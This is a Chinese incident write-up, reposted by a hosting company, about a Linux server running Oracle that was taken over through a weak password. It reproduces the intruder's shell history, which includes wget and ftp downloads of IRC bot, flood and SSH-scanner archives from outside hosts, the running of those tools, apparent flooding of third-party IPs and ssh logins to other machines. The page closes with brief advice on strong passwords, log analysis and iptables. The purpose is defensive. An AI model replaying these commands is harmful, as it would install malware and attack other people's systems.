某Linux服务器被变成肉鸡的过程
作者 佚名技术
来源 Linux系统
浏览
发布时间 2012-05-06
安装了Oracle数据库的Linux服务器, 密码过于简单,导致被变成肉鸡.入侵者登录记录由Logwatch发到了管理员信箱,被管理员发现.入侵者的操作步骤都记录在.bash_history文件里.
提醒:所有帐号口令一定要有强度,避免被猜到.一定要启用日志分析程序.启用Iptables进行安全策略部署.
入侵者操作步骤如下:
cd /var/tmpwget [url]www.bcsteel.com/~temp/seen.tgz[/url] wget 208.145.229.25/~temp/sen.tgz wget 208.145.229.25/~temp/seen.tgz passwd tar zxvf seen.tgz cd .undernet ./pico mech.set ./mech ./mech cd .. wget [url]www.poarta6.lx.ro/sheitan.tgz[/url] cd .undernet/ ./mech ls cd $HOME LS pwd cat .bash_profile ps x killall -9 ./mech killall -9 mech ls cd /var/tmp rm -rf .undernet tar zxvf seen.tgz cd .undernet ./pico mech.set ./mech ./mech ./mech ./mech w ps x killall -9 ./mech killall -9 mech cd /var/tmp ls cd .undernet/ ./mech ./mech ./mech ./mech w wget [url]http://www2.ati.com/drivers/wxp-w2k-catalyst-8-03-040610a-016126c.exe[/url] wget shadowhk.from.ro/bind mkdir ". ." ftp 64.34.66.18 wget 65.182.102.104//loper/master/flod.tar.gz wget 65.182.102.104/loper/master/flod.tar.gz wget sirvic.com/flewd.tgz wget 82.165.128.200/flewd.tgz locate mech uname -a ls cd /var/tmp ls curl -O sirvic.com/flewd.tgz lynx sirvic.com/flewd.tgz wget lalaland.go.ro/juno ftp ftp.go.ro ftp 64.34.66.18 mkdir ". ." cd ". ." vi s chmod x s ls ./s 12.105.145.123 80 ./s 12.105.145.123 80 999 killall -9 s ./s 203.113.252.174 80 999 killall -9 s w ls cd /var/tmp ls ls -la cd .oracle ls cd .. wget [url]http://208.145.229.83/~brett/.temp/dany3l/list2.tar.gz[/url] tar zxvf list2.tar.gz cd .bash ls ./a 203.174 cd /var/tmp wget [url]http://208.145.229.83/~brett/.temp/dany3l/dany.tgz[/url] tar xvf dany.tgz cd .dany ./make ./mech cat /proc/cpuinfo w cd /var/tmp wget session.lydo.org/scan3.tgz wget 64.111.196.20/scan3.tgz ftp 64.111.196.20 wget [url]http://208.145.229.83/~brett/.temp/dany3l/scan3.tgz[/url] [url]http://208.145.229.83/~brett/.temp/dany3l/[/url] ftp [url]ftp://brett:brett@208.145.229.83/usr/home/brett/public_html/.temp/dany3l/[/url] ftp 208.145.229.83 wget [url]http://208.145.229.83/~brett/.temp/dany3l/scan3.tar.gz[/url] wget [url]http://208.145.229.83/~brett/.temp/dany3l/scan3.tar[/url] tar zxvf scan3.tar cd scan mv a assh ./auto ls head 21 screen wget [url]http://208.145.229.83/~brett/.temp/dany3l/screen[/url] ./screen cmdmode x screen chmod x screen ./screen cd /var/tmp/scan ks ls cat vuln.txt screen -r cd /var/tmp cd scan ls cat vuln.txt screen -r ssh -l staff 211.21.139.28 ssh -l 211.21.139.28 staff ssh -l staff 211.21.139.28 cd /var/tmp ls cd scan ls cat vuln.txt scren -r screen -r cd /var/tmp/scan cat vuln.txt screen -r cd /var/tmp/scan ls cat vuln.txt screen -r cd /var/tmp/scan ls cat vuln.txt screen -r cd /var/tmp/scan ls cat vuln.txt screen -r cd /var/tmp/scan ls cat vuln.txt screen -r cd /var/tmp ls cd scan` [ cd scan ls cat vuln.txt screen -r cd /var/tmp/scan ls cat vuln.txt screen -r cd /var/tmp/scan ls cat vuln.txt cd /var/tmp/scan ls cat vuln.txt screen -r cd /var/tmp cd scan ls ps x ps x cd /var/tmp/scan l ls cat vuln.txt screen -r cd /var/tmp/scan ls cat vuln.txt screen -r cd /vr/tmp/scn cd /var/tmp/scan ls cat vuln.txt screen -r cd /var/tmp/scan ls cat |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于某Linux服务器被变成肉鸡的过程的所有评论
